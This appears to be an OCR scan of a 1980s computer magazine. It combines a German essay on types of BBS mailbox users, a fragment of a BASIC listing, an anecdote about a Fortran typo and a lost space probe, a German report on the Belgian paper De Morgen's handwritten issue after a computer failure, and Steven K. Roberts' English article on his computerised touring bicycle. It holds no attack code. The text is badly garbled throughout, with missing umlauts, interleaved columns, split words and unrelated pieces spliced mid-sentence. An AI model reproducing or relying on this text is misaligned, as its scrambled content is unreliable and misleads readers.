Befehle der Box berhaupt nicht, er verwendet stattdessen viel lieber seine Fantasie auf die Erfindung neuer Befehle und fhrt minutise Aufzeichnungen darber. Er hat ein umfangreiches angelesenes Wissen aus Computerzeitschriften und wendet dieses e r b a r m u n g s | 0 s auf alle Mailboxen an, die er in die Finger krieat Als extrem strend empfindet eres, wenn einer seiner Befehle tatschlich einmal zu e i n e m sinnvollen Ergebnis fhrt, meist reagiert er dann wie der Schchterne und legt einfach auf Ganz anders dagegen

der Computerlegastheniker Er wrde nichts lieber sehen, als wenn die Mailbox nur ein einziges Mal das tun wrde, was er will, aber leider nie in der richtigen Form eingeben kann. Seine bedeutendste Geistesleistung besteht darin, seitenweise Erklrungen zur Boxbedienung zu lesen, ohne deren Inhalt auch nur annhernd zu erfassen. Eine Zeichenfolge, die einmal sein Auge passiert hat, verdampft rckstandslos in den den Korridoren seiner Ganglien. Er hat irgendwo mal gelesen, da man in Mailboxen mit dem Befehl Help weiterkommt und gibt diesen folgerichtig immer wieder ein, wobei es ihm gar nicht zu Bewutsein kommt, da die Mailbox ihm stndig erklrt, da er doch das deutsche Wort Hilfe benutzen mge. Gemeinsam ist diesen Typen, da eigentlich nicht viel dazugehrt, um ihr Verhltnis zur Mailbox nachhaltig zu verbessern. Ein bischen weniger Ignoranz vielleicht , und etwas mehr Aufmerksamkeit fr das, was zur Bedienung einer Mailbox wichtig ist. Immerhin zwingt ihre Anwesenheit in den Mailboxen die Betreiber dazu, stndig darber nachzudenken, wie die Benutzerfhrung idiotensicher gemacht werden kann, ohne sie und die Folgen, die ihr Dasein hat, wre die Mailbox einer anderen Gruppe hilflos ausgeliefert. Hauptvertreter dieser Gruppe ist der Schmierer er kennt sich in der Bedienung der verschiedensten Mailboxsysteme bestens aus, zumindest wei er, wie er mit seinen geistigen Ergssen ein mglichst breites Publikum erreicht. Die Nachrichten, die er hinterlt, sind entweder vllig inhaltslos, oder dienen ausschlielich der Selbstdarstellung und der Beschimpfung anderer Benutzer. Treffen in einer Mailbox zwei oder mehr Schmierer aufeinander, so ist die Vorstellung gelaufen und Megabyte auf Megabyte verschwindet zu Lasten sinnloser Nachrichten, bis das ganze System zugemllt ist. Es gibt Boxen, die dieses Stadium schon lange erreicht haben, ohne da es bemerkt wurde. Der andere Hauptvertreter

ist der Hacker Eigentlich ist er kein wirklicher Hacker, sondern lediglich eine Person mit destruktivem Charakter. Von Hackerethik hat er noch nie gehrt
LIST 47 48 50 52 55 69 65 67 78 72 73 75 77
79

45-79 REM CHANGE HIM TO SUPERMAN REM PRINT"H" GOSUB6800 PRINT" 60SUB6888 PRINT" GOSUB6800 PRINT" PRINT" PRINT" PRINT" PRINT" PRINT" PRINT" PRINT"

45 FOR I = i TO600 NEXT REM WAIT A WHILE

VI q I V

PRINT"

B und schpft sein Wissen aus den halbseidenen Publikationen dubioser Verlage. Da sein angelesenes Wissen nicht ausreicht, um in groen Systemen ttig zu werden, beschrnkt er sich darauf, in den lokalen Mailboxen Unsinn zu machen. Seine Kenntnisse von Software und Hardware beschrnken sich auf das, was er vom Hrensagen her kennt, dementsprechend lcherlich nehmen sich auch seine Versuche aus, die Mailbox zum Absturz zu bringen. Er hat immer noch nicht begriffen, da seine Aktionen letztendlich gegen sich selbst gerichtet sind, denn wenn seine Strategie erfolgreich sein knnte, wrde er sich selbst jeder Mglichkeit berauben, im globalen Dorf mitzumischen. Ein halbwegs fehlerfreies Mailboxprogramm und ntigenfalls wirksame Zugangsbeschrnkungen befreien den gestreten Sysop recht wirkungsvoll von diesen unangenehmen Zeitgenossen und sorgen fr erfrischende Ruhe im System, ohne der Spontanitt Abbruch zu tun. Man sollte nun meinen, da der Rest der Mailboxbenutzer in aller Ruhe mit dem System arbeitet, ohne den Sysop in den frhen Wahnsinn zu treiben, aber weit gefehlt, auch unter den allseits geschtzten serisen Benutzern gibt es welche, deren Ansprche den Sysop auf den Zimmer-Yucca schieen. Da ist zum Beispiel der Vollprofi Er hat seine Erfahrungen auf kommerziellen Mailboxen gesammelt und bertrgt sie nun weitgehend unreflektiert auf private Systeme. Wenn er nicht auf Anhieb eine Verbindung zustandekriegt, verzieht er sich in seinen

'READY.

auszukitzeln, was die Benutzer wnschen. Mit wachsender Erfahrung und steigender FreGott und der Welt. Er benutzt vorzugsweise die quentierung derMailbox wird man meist ruhiger Befehle, die er von der kommerziellen Box und es kommt zu einem Lernproze fr den qewhnt ist und registriert meistens nicht einBetreiber, der zwangslufig auf eine Entmal wenn die Mailbox etwas ganz anderes scheidung hinausluft. Dabei stehen drei Almacht Als Ausgleich fr den durchlebten Frust ternativen zur Verfgung, die je nach Tempeberschttet er den Sysop mit Forderungen, rament des Betreibers gewhlt werden. Einige was alles am Programm wie zu ndern wre. geben ganz auf, motten ihren Computer ein , Unglcklicherweise hat der Vollprofi meist ausnur um ihn nach mehr oder weniger langer Zeit gezeichnete Kenntnisse gngiger Mailboxwieder hervorzukramen und sich erneut ins konzepte und Porgrammiersprachen-, so da Leben des globalen Dorfes zu strzen, entseine Vorschlge meist peinlich detailliert ausweder um endlich, endlich konstruktiv an den fallen. Bei Sysops, die nur aus moralischer Not eigenen Utopien und denen der Anderen weidas Programmieren gelernt haben, kann dies terzubauen, oder aber um sich mit Elan in eine durchaus Auslser fr Suizidversuche sein. Etfremde Mailbox zu strzen und dort hingewas harmloser ist da schon bungsvoll all die Befehle zu probieren, die man bei anderen belchelt hat. Andere denken sich der Semiprofi ihr Teil und machen einfach weiter, ungeachtet dessen, was in der Welt um sie herum geEr ist sich der Tatsache durchaus bewut, da schieht. Diese Mailboxen erkennt man daran, er es mit einem unzulnglichen System zu tun da sie vllig abgeschottet von dertechnischen hat und ist auch an und fr sich bereit, mit den und gesellschaftlichen Weiterentwicklung ber Mngeln zu leben, wenn man nur dieses und Jahre hinaus vor sich hin existieren, ohne nach jenes eventuell, wenn es nicht zuviel Muhe dem Wenn und Aber zu fragen. Wieder andere macht, und wenn es die Zeit erlaubt, in dieser erarbeiten sich eine dicke Hornhaut und ziehen und jener Hinsicht ndern knnte. Er wiederholt ihre Vorstellungen durch, allein oder in Zudiese Bitte sooft, bis der Sysop entnervt aufgibt sammenarbeit mit anderen entwickeln sie die technischen und inhaltlichen Mglichkeiten dieund zumindest etwas Ahnliches programmiert, ses faszinierenden Mediums weiter. Dabei verweil er genau das schon seit langem machen selbstndigen sich zwangslufig gewisse Dinwollte. ge und niemand sollte erwarten, da sich ein Selbstverstndlich gibt es dann noch Leute wie Mailboxbetreiber, dessen System jhrlich Du und ich , die dem Sysop das Leben er15000 Anrufe verarbeitet, noch so intensiv um leichtern wo sie nur knnen, die inhaltlich arjeden Einzelnen kmmern kann, wie in den beiten und selbst Verantwortung bernehmen. ersten Monaten. Je umfangreicher das Projekt Die Zeit der ersten zaghaften Schritt durchs Mailbox wird, desto schwieriger wird es, Allen qlobale Dorf sind vorber und die teils reierigerecht zu werden und desto mehr bleibt der sche Berichterstattung der Fachpresse hat ein Idealismus auf der Strecke. Heer von Datentouristen mit sich gebracht, die auf die Ureinwohner losgelassen werden und Es gbe noch eine Menge mehr zu erzhlen, ihre eigene Kultur verbreiten. Die Szene mu Anekdoten und Anekdtchen, von Usern und diese Leute auffangen und das Verhalten aller Abusern, von Frust und Lust des Sysops, von regulieren, oder sie geht unter. Hoffnungen und Wnschen, erfllten und unerfllten Erwartungen, aber es soll jetzt genug Als Betreiber einer Mailbox steht man diesen sein. Ich hoffe, es waren einige Denkanste Ungereimtheiten im Benutzerverhalten eindabei und ich habe eine Menge erzhlt, von igermaen hilflos gegenber. Wenn man seine dem was wirklich los ist. . . Mailbox gerade eben erffnet hat und sehnschtig darauf wartet, da sich etwas tut, ist man bereit, um jeden User zu kmpfen, man Hamburg, 1987 lauert stundenlang, tagelang, nchtelang vor fl HD did programing punctuation r r o r dem Monitor, ist sofort bereit, einen stundenliad to the loss of a Mariner probe to langen Dialog von Tastatur zu Tastatur zu fhVenus? ren und untersttzt die Anrufer, wann imnner ft. In a Fortran progra, "DO 3 1 - 1 , 3 man auch nur entfernt befrchtet, es knnte der istyptd i t 'DO 3 1 - 1.3" which ccepttd by th* c o i p i l r as assigning 1 . 5 letzte Anruf gerade dieses Menschen sein, der to th variabl D031. so viel Gutes in anderen Mailboxen produziert. ( Y D U will have to rad th* ftnnals t h e History o Cosputino. ISM to find 6ut*hi" < Jede Kritik, die ausgesprochen wird, trifft mitten this caused th* loss o) ths 'probe.) ins Herz, und man setzt Himmel und Holle in Source 1 I N P U T / O U T P U T , Bewegung, um aus dem Programm das herSchmollwinkel und hadert mit sich, der Box und

Als der Blackout kam, half nur noch der Griffel


Es soll ja vorkommen, da Leser ihre Zeitung manchmal nicht ganz plausibel finden. Da sie aber Probleme haben, sie zu entziffern, drfte wohl einmalig sein. So geschah es diese Woche in Belgien.
Von HELMUT HETZEL

le?" Im Blatt dann ein Artikel zu selbigem Thema. Recherchiert war er von den Kolleginnen und Kollegen, deren Hnde nur Hieroglyphen aufs Papier bringen konnten. Sie muten ja auch irgendwie beschftigt werden und durften mit diesem selbstkritischen Beitrag das Schriftbild der tatschlich zur Feder greifenden Schnschreiber bis ins I-Tpfelchen analysieren. Ergebnis des graphologischen Gutachtens: Die Handschrift der K.olleginnen und Kollegen lt deutlich darauf schlieen, da es sich bei diesen Personen um Idealisten mit einem ausgesprochenen Interesse fr alles Geistige handelt." Aber auch der Umkehrschlu der graphologischen Dialektik wurde dem Leser nicht vorenthalten: Diesen Idealismus kann man natrlich auch als einen Mangel an Realittssinn interpretieren." Einen Tag nach Erscheinen der handgeschriebenen Nummer des Morgen" (die brigens in wenigen Stunden ausverkauft war) bringt die Post die schriftlichen Reaktionen der Leser gleich stapelweise in die Redaktion, klingelt das Telefon beinahe ununterbrochen. Es hagelt Glckwnsche", sagt eine der Sekretrinnen. Aber mit Kritik wird auch nicht gespart. Die meisten Unzufriedenen beklagen sich darber, da sie doch picht alles entziffern konnten, was in der Zeitung stand",.meint Doreen Espeel, die selbst mit Hand an' den Griffel legte und sich daher auch persnlich von dieser Kritik angesprochen fhlt. Insgesamt aber sind die Reaktionen berwiegend positiv. Es melden sich auch immer mehr Sammler, die sich eine solche einzigartige Zeitungsnummer nicht entgehen lassen wollen." Dennoch ist sich die Redaktion, die nebenbei auch noch gegen Zahlungsunfhigkeit und drohende Einstellung des Blattes ankmpfen mu, bei allem journalistischem Idealismus und der vom Kollegen Computer entfesselten Kreativitt darber im klaren: So etwas knnen wir uns kein zweites Mal leisten."

ltzlich knallt es. Der Strom fallt aus. Die Fernschreiber stehen still. Die Bildschirme der Computer verdunkeln sich. Dem Redakteur wird es ganz mulmig. Automatisch schiet es ihm durch den Kopf: Hoffentlich ist mein Text gespeichert." Systemausfall im Zentralcomputer" heit das unter Fachleuten. In der Regel sind solche Strungen im Textverarbeitungs-System bei Zeitungen schnell behoben. Da das Erscheinen der Zeitung dadurch wirklich gefhrdet wird, ist eher unwahrscheinlich. Genau das dachten wir auch", sagt Doreen Espeel, Redakteurin der flmischen Tageszeitung De Morgen", die mit ihren Kollegen einen solchen Systemausfall im Zentralcomputer auf wohl noch nie dagewesene Weise lste. Der Strom blieb diesmal stundenlang weg. Die Zeit verstrich immer schneller. Die Techniker konnten den Fehler im Computersystem einfach nicht finden. Unsere Redaktions-Schluzeiten rckten immer nher. Und als es 17.00 Uhr geschlagen hatte, da war uns klar: Jetzt mu irgend etwas geschehen." Nur, was? Das war jetzt die groe Frage. Es stellte sich nmlich schnell heraus, da fr 34 Redakteure nur noch zwei alte Schreibmaschinen irgendwo verstaubt in einer Ecke der Redaktion herumstanden, und auch der Versuch, die Zeitung woanders drucken zu lassen, war so gut wie gescheitert. Da wre wohl nicht einmal mehr eine vierseitige Notausgabe zustande gekommen." Viel Zeit zum Diskutieren blieb nun nicht mehr. Entschlossen folgte die Redaktion dem von Chefredakteur . Paul Goossens ausgegebenen Motto: Eine Tageszeitung mu jeden Tag erscheinen." Nur, wie? In dieser brenzligen Situation besttigte sich die alte Binsenweisheit Not macht erfinderisch".

Da man nicht gengend Schreibmaschinen hatte, eine Notausgabe zeitlich kaum mehr zu schaffen war, scho den Redakteuren ein ganz ungewhnlicher Gedanke durch den Kopf: Warum sollte man die Zeitung nicht einmal mit der Hand schreiben? Gedacht, getan. Damen und Herren, deren Handschrift die einstigen Schnschreib-bungen aus der Grundschule noch ansatzweise erkennen lie, muten nun an die Front. Dann ging es los. Dem Kollegen Computer wollte man mal ein Schnippchen schlagen, es ihm einmal so richtig zeigen." So lautete die Parole der Redaktion. Unser Ehrgeiz war es, eine ganz normale Zeitung zu machen - nur eben handgeschrieben", erlutert Doreen Espeel. Und schlielich wollte man sich wegen dieser kleinen technischen Strung am nchsten Tag bei Nichterscheinung des Morgen" nicht auch noch den freigewordenen Titel einer flmischen Satire-Zeitschrift anhngen lassen. Das Satire-Blatt, das jngst Pleite machte, hie Der Schweiger".

Die Leser reagierten berwiegend positiv


Kugelschreiber und Filzstifte glhten. Und am nchsten Morgen lag eine einzigartige Zeitungsnummer an den Kiosken in Flandern. Aufmacher, fein suberlich in Versalien und von Hand gestylt: Wer schreibt, der bleibt." Unterzee: Graphologie: Die groe Handschrift - pure Absicht oder greifen Sie doch lieber zur Bril- s 'f;*ww'

Dem Kollegen Computer ein Schnippchen schlagen"

Der handgeschriebene Morgen": Wer tchreibt, der bleibt

NOMADICS

COTTAGE ON WHEELS
i* v

ti

em
by Steven K. Roberts
| N RURAL OHIO, among the M white clapboard houses and B autumn maple trees of Christiansm j burg, the sun glinted off the solar m i panels of my eight-foot-long recumbent bicycle. I was hunkered over my bicycle's computer, which was plugged into the town's only pay phone, linked via satellite with a distant publisher. Tiny letters of text scrolled across the liquid crystal display screen. An old farmer rattled up to the curb in his battered pickup, squeaked open the door and headed for the M&M Cafe, wearing a corn herbicide cap and green coveralls. He squinted at me, then at the computer, then at the modem cable dangling from the familiar pay phone. He looked at the bike, at the strange linkages and controls, at the blinking LEDS slowly shaking his head at the apparition that had materialized in his quiet town. Suddenly a look of understanding lit his craggy features. He spat tobacco juice into the weeds and peered at me quizzically. "You with NASA?" I grinned up at him. "Why, yessir, this here's one o' them Loony Excursion Modules . . . " We stared at each other, for a moment like representatives of alien cultures, then both laughed. The encounter, barely 100 miles into an adventure that has now passed the 11.000-mlle mark, set the tone for the whole journey: I am an agent of future shock, frolicking in that strange region where the boundaries between technology and magic blur. I have finally found a job I like: high-tech nomad. Freelancing through the years, I have slaved away in bedrooms, living rooms, industrial parks, basements, cubicles, and posh offices. The same problem always surfaced sooner or later lack of change. Sinking into the clutter of my own static space, I would turn to the office distractions: redecorating, making phone calls, creating new filing systems, fiddling with desk toys, and staring at the same old walls. I would do anything besides write: even passion can be dulled by a changeless environment.

Steven Roberts uploads a day's worth ol writing Into the nearest port a roadside pay phone. From there it travels to a network like The WELL, where it can be sent directly to a typesetting machine, as this article was.

Valley after the Big One. While traveling full time on this machine, I maintain a freelance writing business the ideal way to get paid for playing. With occasional layovers for major projects, I have been doing this since late 1983, cranking out some four million pedal strokes, and about the same number of keystrokes. This all may sound idyllic and romantic, but making such a caper work requires much more than chutzpah and leg muscles. How can an intense, Information-oriented business an activity that depends on word processing, photocopying, proposals, filing, business planning, invoicing, and all that be operated from a pedal-powered contrivance upon which every ounce counts? How can the illusion of stability be maintained when dealing with such staid institutions as banks and insurance companies? And, perhaps most important, what are the tools that have allowed me to break the chains that once bound me to my desk and make a living anywhere with virtually no overhead? The electronic cottage on wheels that supports my nomadic lifestyle would have been impossible as recently as five years ago. I harbor over a megabyte of memory on board, serving a closely linked network of five microprocessors that work together in a variety of ways. The systems all run on solar power. They roll down the road aboard the latest in human-powered vehicle design. And they communicate with the rest of the information universe through computer networks and packet satellite links. My "Winnebiko" grows as technology grows, slowly evolving along with changes in device physics and software philosophy. In a sense, of course, this entire caper is a caricature but it is an instructive and entertaining one, applicable to a

wide range of lifestyles and businesses. My "Computing Across America" adventure is a case o f personal computers and network communication carried to an exquisitely mad extreme.
INFORMATION FLOW

The essence of the journey is Information. I inhale it, store it, fiddle with it, and disgorge it in the endless attempt to keep myself alive in the mercurial freelance writing business. This is an idal enterprise for a nomadic generalist, of course, for everything is copy (and words have no mass). But writing on the road turns out to be an interesting challenge, particularly when the load-carrying capacity is that of a bicycle instead of a motor home. Cassette dictation is a pain, yielding non-editable speech that never seems to get transcribed. Stopping to jot notes is too much trouble. It has to be electronic. During my first 10,000 miles, I carried only one computer. Though it was an astonishingly robust system (the HewlettPackard Portable PLUS), I still couldn't write while riding. Since 10,000 miles corresponds to roughly 1,000 hours of pure pedaling time (half a business year), this is no small matter I had far too many days of good ideas, good intentions, and no work output. What I needed in addition to the HP was a bike-mounted system, an electronic web to capture my ideas like passing butterflies and store them for later processing. I wanted to find a machine that would support word processing, long-term file storage, daily electronic mail, and a number of other information-processing functions . . . all on the bicycle itself. But commercial computers were made for desktops, not biketops. I took a year's sabbatical from the road and dedicated myself to building a different,

ij

Ail the comforts ol home and office. A tent. A stove. A computer. A shortwave transmitter. A CB radio. Solarrecharged batteries. Naturally the vehicle is dubbed the Winnebiko.

My new mobile office is different. It materializes wherever and whenever I need it and though there are plenty of distractions,' I never have the same one twice. By its very nature, my mobile office Is a stimulating place (sometimes even a thrilling one), and for the first time in my career, working is as at least as much fun as playing. In fact, they are inseparable. I live in a world that is part bicycle, part computer network, and part kaleidoscopic amalgam of lifestyles that span the full spectrum of human behavior. My office is a computerized, 36-speed, 220-pound, 8-foot-long recumbent bicycle bedecked with solar panels and enough gizmology to re-seed Silicon

Resembling tu Instrument pano! ol a B-52 moie than a bicycle, Mission Control Is wrtWn arm's length.

my hospitality database. a list o f 2 . 5 0 0 contacts retrievable by n a m e , location, e t c . ) , but its primary use is t e x t u a l . W h e n I ' m o n t h e r o a d , everything changes. As ideas f l o w f r o m t h e r h y t h m o f pedals, t h e depth o f breath, and t h e s w e e t sensations of m o v e m e n t , my fingers dance a quiet staccato o n t h e handlebars. T h e y m o v e as if playing t h e flute, pressing combinations o f eight w a t e r p r o o f keys t o yield any o f 2 5 6 binary codes - a convenient handlebar/ k e y b o a r d t h a t will t y p e b o t h l e t t e r s and c o n t r o l characters. U p in t h e console, t h e bicycle c o n t r o l processor reacts decoding t h e incoming data into a m o d i fied Radio Shack M o d e l 100 w i t h 2 5 6 K

t h e n e w , improved W i n n e b i k o III a chance t o o b s o l e t e all this d e d i c a t e d h a r d w a r e I just spent eight m o n t h s building and replace it w i t h s o f t i n s t r u m e n t s . . . a user i n t e r f a c e n o t u n l i k e the Macintosh (under c o n t r o l o f a m o u s e , no d o u b t ) . T h e displays a n d controls most important t o t h e t a s k a t hand should be the ones t h a t m o v e i n t o visual p r o m i n e n c e o n t h e c o n s o l e w i t h pull-down w i n d o w s t o i n v o k e related functions (even satellite n a v i gation and C D - R O M maps). W e h a v e t h e technology. T h e only missing l i n k s a r e a l o w - p o w e r , high-resolution display a n d a n o t h e r year o f m y t i m e . field

THE NETWORK C O N N E C T I O N
Full-time bicycle t o u r i n g raises a n interesting issue. W h a t , in t h e w o r d s o f Alvin T o f f l e r , can a t r a v e l e r use as a n "enclave o f stability" while w a n d e r i n g endlessly across t h e earth's surface? T h e bike itself, while, deeply familiar a n d " h o m e " in many ways, is n o t e n o u g h t o satisfy t h a t basic n e e d . M y enclave o f stability is f o u n d o n t h e n e t w o r k s a strange a m a l g a m o f satellite and bicycle, cloud and soil, a place t h a t is n o place y e t is e v e r y p l a c e at o n c e . Give m e a t e l e p h o n e a n d I ' m h o m e : all i t takes is c o n n e c t i o n o f t h e c o m p u t e r and a f e w t y p e d c o m m a n d s and I cross t h a t familiar t h r e s h o l d , s e e t h e G E n i e sign-on messages t h a t l e t m e k n o w I'm inside. B e y o n d t h o s e e l e c t r o n i c portals I m e e t m y closest friends, k e e p up w i t h t h e activities o f m y O h i o o f f i c e ,

Traveling with a companion eases the stress ol a pioneering lllestyle. On-board CB radios help communicate on the road.

publish w e e k l y travel tales, s e e k h e l p w i t h arcane technical p r o b l e m s , f i n d k i n d r e d spirits, and s o m e t i m e s just h a n g around bantering w i t h o t h e r v a p o r o u s denizens o f t h e n e t w o r k I n t e l l e c t u a l p r o j e c t i o n s o f real humans s i t t i n g s o m e w h e r e o n E a r t h . I w a n d e r f r e e l y in physical space, r e t u r n i n g t o m y s t a b l e system. T h e original i n t e n t i o n being able t o t y p e while riding quickly evolved into a c o m p l e t e bicycle c o n t r o l and communications system n o t only turning t h e W i n n e b i k o into a mobile o f f i c e but also starting so many o n - t h e s t r e e t conversations t h a t a n o n y m i t y has b e c o m e impossible. ( T h a t ' s half t h e fun, o f course, given the research p o t e n t i a l o f social contacts.) T h e principles a r e simple e n o u g h . T h e bike carries five c o m p u t e r s , n e t w o r k e d t o g e t h e r in ways t h a t vary as a f u n c t i o n o f t h e t y p e o f w o r k in progress. W h e n I ' m n o t pedaling, t h e only o n e in use is
t h e

o f memory. T h e net effect: smooth, machine-readable t e x t captured while I ' m o n the road, yielding files t h a t can b e d o w n l o a d e d t o t h e H P f o r fine tuning and subsequent transmission. Bike w r i t i n g was t h e main m o t i v e , b u t w i t h all t h a t solar-powered processing h o r s e p o w e r o n b o a r d , it w a s inevitable t h a t a f e w o t h e r functions w o u l d e m e r g e . T h e battery-charging process is n o w u n d e r c o m p u t e r c o n t r o l , as are t h e security system, self diagnostics, elect r o n i c compass, and m o r e . A f o u r t h processor handles speech synthesis (it can read t e x t files o u t loud and explain itself t o curious passers-by); a fifth manages p a c k e t data c o m m u n i c a t i o n via t w o - m e t e r h a m radio. T h e t e r m "elect r o n i c c o t t a g e on w h e e l s " is by no means frivolous, and as the trip p r o gresses, o t h e r p r o j e c t s slowly g e t d o n e ( o r at least started) for no complex system is ever 100 p e r c e n t c o m p l e t e . I ' m already p l o t t i n g t h e d e v e l o p m e n t of

h o m e in D a t a s p a c e night a f t e r n i g h t f o r stability and security. This is central t o t h e j o u r n e y , f o r i t provides daily c o m m u n i c a t i o n w i t h o u t those t r a d i t i o n a l w a n d e r e r s ' hassles of general-delivery mail and t e l e p h o n e tag. I have an assistant in O h i o n a m e d Kelly, w h o is m y full-time u n i v e r s e i n t e r face ( " t h a t means I pray f o r h i m , " s h e explains, only half-joking). A l l c o m munication is funneled t h r o u g h h e r : business c o r r e s p o n d e n c e is p r o c e s s e d and r e p o r t e d online; p e r s o n a l l e t t e r s a r e held f o r t h e n e x t " m a t t e r t r a n s f e r " event; p h o n e calls are f o r w a r d e d e l e c tronically. She handles m o n e y , p r i n t s a n d mails manuscripts t o o f f l i n e p u b l i s h e r s and keeps old friends up t o d a t e o n m y activities. Kelly is m y link t o business reality, G E n i e is my link t o Kelly, a n d t h e H P c o m p u t e r system is m y l i n k t o the network. A n d h o m e is w h e r e v e r I h a p p e n t o b e as long as there's a t e l e p h o n e n e a r b y .

H P an exquisite machine w i t h

8 9 6 K , electronic disk, and applications s o f t w a r e baked into R O M . A r t i c l e s o r b o o k chapters b e c o m e files, w h i c h are t h e n t r a n s f e r r e d f r o m t h e first available t e l e p h o n e t o my O h i o o f f i c e via electronic mail on t h e GEnie c o m p u t e r n e t w o r k (this article, h o w e v e r , was e-mailed through T h e W E L L ) . T h e H P p e r f o r m s o t h e r jobs (such as managing

BIKE ELECTRONICS
T h e c o m p u t e r s are just p a r t o f t h e W i n n e b i k o system, t h o u g h t h e i r d i r e c t influence e x t e n d s into e v e r y c o r n e r and their c o m p l e x i t y has required an onboard m i c r o f i c h e d o c u m e n t a t i o n library. O f nearly equal value, f r o m t h e lifestyle standpoint, is t h e c o m m u n i c a t i o n s gear. M y mobile h a m radio station (call sign K A S O V A ) is a m u l t i m o d e t w o - m e t e r transceiver made by Yaesu. In addition t o handling p a c k e t data satellite c o m munication (see W E R # 5 0 , p. 4 7 ) w i t h the aid o f a P a c - C o m m terminal n o d e controller, it allows m e t o stay in regular voice c o n t a c t w i t h m y traveling c o m panion, Maggie ( K A 8 Z Y W ) . (Sharing a bicycle t o u r w i t h o u t s o m e f o r m o f c o m m u n i c a t i o n is frustrating, as anyone w h o as ever squinted into t h e m i r r o r for minutes at a t i m e well knows.) W i t h a b o o m m i c r o p h o n e built into my Bell h e l m e t and a push-to-talk switch o n t h e handlebars, Maggie is never far away ( e f f e c t i v e b i k e - t o - b i k e simplex radio range is a b o u t t w o miles). O f course, having t w o - m e t e r F M capability o n t h e bike also connects m e t o a vast n e t w o r k o f h a m radio o p e r a t o r s . I store t h e local r e p e a t e r frequencies in t h e radio's m e m o r y as I approach an area, and periodically identify myself as an incoming bicycle mobile. Range in this case is upwards o f 2 5 miles, since repeaters are generally in high-profile locations. This has led t o a n u m b e r o f interesting e n c o u n t e r s , and t h e a u t o patch systems o f t e n let m e m a k e t e l e p h o n e calls t o non-hams directly f r o m t h e bike. A C B radio is also o n b o a r d , culturally useless by c o m p a r i s o n , b u t still valuable enough to justify its w e i g h t . I can talk t o t r u c k e r s , hail a passing m o t o r h o m e f o r w a t e r (this saved m y life in central U t a h ) , and shake my head at t h e idiomatic yammerings o f t h e residual g o o d - b u d d y subculture t h a t hung on a f t e r t h e d e a t h of the great C B boom. System security is as i m p o r t a n t an issue as survival w h e n living o n a machine t h a t looks like a r o g u e N A S A c r e a t i o n o f incalculable value. But it's n o t t h a t people t r y t o steal it m o s t are intimidated by t h e t e c h n o l o g y it's just t h a t s o m e let t h e i r curiosity e x t e n d t o flipping switches and occasionally even climbing o n t o t h e seat and bending t h e kickstand. T o a l e r t m e t o such rude behavior, I added a paging security system w i t h vibration sensors; w h e n a r m e d by a f r o n t - p a n e l keyswitch, d e t e c t e d m o t i o n causes it t o transmit a t o n e - e n c o d e d f o u r - w a t t signal t h a t triggers my p o c k e t b e e p e r up to t h r e e miles away. O t h e r radio-related devices include a Sony digital s h o r t w a v e f o r international broadcast r e c e p t i o n , a Sony W a t c h m a n micro-TV, and an F M s t e r e o . Naturally,

t h e r e is also a n audio cassette d e c k , and a c o m p a c t disc player is planned f o r under-dash installation s o o n . W i t h this load, it s o m e t i m e s takes a l o t m o r e than t h e usual granny gears to climb a mountain. T h e n t h e r e is t h e m a t t e r o f p o w e r . All t h e e q u i p m e n t described so far, plus behind-the-scenes c o n t r o l circuitry, requires e l e c t r i c i t y in six d i f f e r e n t voltages. A pair o f 1 0 - w a t t Solarex p h o tovoltaic panels serves as t h e p r i m a r y source, providing a b o u t 1.3 amps t o t h e 12-volt S A F T N i - C a d b a t t e r i e s u n d e r ideal conditions. T h e charging process can b e digitally m o n i t o r e d f r o m t h e f r o n t panel, and t h e bicycle c o n t r o l p r o c e s s o r intervenes if its calculations suggest t h a t t h e b a t t e r i e s a r e in danger o f overcharging. W h e n t o o many cloudy days o c c u r b a c k - t o - b a c k , a p o w e r supply w i t h line c o r d allows refueling f r o m house c u r r e n t . G e n e r a t i n g t h e o t h e r voltages is a c o m plex issue, b u t suffice it t o say t h a t n e w " s w i t c h i n g p o w e r supply" devices have made high-efficiency voltage regulation relatively easy. T h e subsidiary supplies are s w i t c h e d in and o u t o f standby m o d e as n e e d e d , and t h e i r o u t p u t s a r e available o n t h e f r o n t panel t o p o w e r t e n t lights, small radios, and similar accessories. O t h e r front-panel instrumentation includes t h e o b l i g a t o r y C a t - E y e solar bicycle c o m p u t e r t o display speed, distance, c a d e n c e , and so o n . This Is flanked by an a l t i m e t e r , a t w o - l i n e L C D f o r t h e E t a k e l e c t r o n i c compass and o t h e r sensors, t i m e and t e m p e r a t u r e display, and assorted status indicators.

ass). As an added b e n e f i t , I can actually see t h e lands I'm riding t h r o u g h l o o k ing a r o u n d f r o m my lawn-chair-on-wheels while t h o s e on d i a m o n d frames stare d o w n a t t h e road. A n d o n t o p o f all t h a t , t h e r e c u m b e n t can c a r r y m o r e ( t r y 2 2 0 pounds plus r i d e r o n a regular bike). But n o n e o f t h e f e w c o m m e r c i a l rec u m b e n t s o f f e r e d t h e right c o m b i n a t i o n o f f e a t u r e s and quality, so in t h e s u m m e r o f 1 9 8 3 I began building o n e in m y old suburban O h i o b a s e m e n t . I quickly learned t h a t f r a m e building is a c o m p l e x a r t f o r m and t u r n e d f o r help t o Franklin Frames o f Columbus, an o u t f i t w i t h long e x p e r i e n c e in m a k i n g t a n d e m bike frames. " H e y , can y o u give m e a hand w i t h this?" I asked, gesturing at m y c r u d e brazing job. " U h . . . maybe w e should start o v e r . " G o o d advice. T h e resulting machine was designed f o r full-time, heavily loaded touring, w i t h thick-wall, c h r o m e - m o l y tubing, triple r e a r stays, t a n d e m - s t y l e crossover drive, wide-range gearing ( l a t e r e x p a n d e d t o 3 6 speeds), and a 4 8 - s p o k e undished r e a r w h e e l w i t h disc brake. T h e handlebars a r e under t h e seat, w i t h a linkage o f stainless steel tubing c o n n e c t i n g t h e m t o t h e f r o n t f o r k and its 16-inch c u s t o m w h e e l . A s t o c k seat f r o m Infinity Recumbents was m o u n t e d w i t h m a c h i n e d aluminum blocks, and the e n t i r e machine was f i t t e d w i t h braze-ons t o s u p p o r t m y unusual needs. I t o o k it f r o m t h e r e using t h e bike as a substrate f o r t h e trappings o f m y life, changing f o r m e v e r y y e a r o r so as n e w technologies b e c o m e available. A n d 11.000 miles later, it's still rolling a bit w o r n in places, m o d i f i e d h e r e and t h e r e but as solid and dependable as ever. A l l o f this taken t o g e t h e r yields a rem a r k a b l y liberating system, providing n o t only t h e tools t o w o r k a n y w h e r e b u t e n o u g h media interest t o k e e p t h e w r i t i n g business growing. T h e w h o l e affair is a cultural d o o r - o p e n e r att r a c t i n g interesting p e o p l e in every t o w n and keeping me well p r o v i d e d w i t h s t o r y m a t e r i a l and personal satisfaction. It's a f r e e l a n c e w r i t e r ' s dream: a self-sustaining e x i s t e n c e o f tax-deductible, 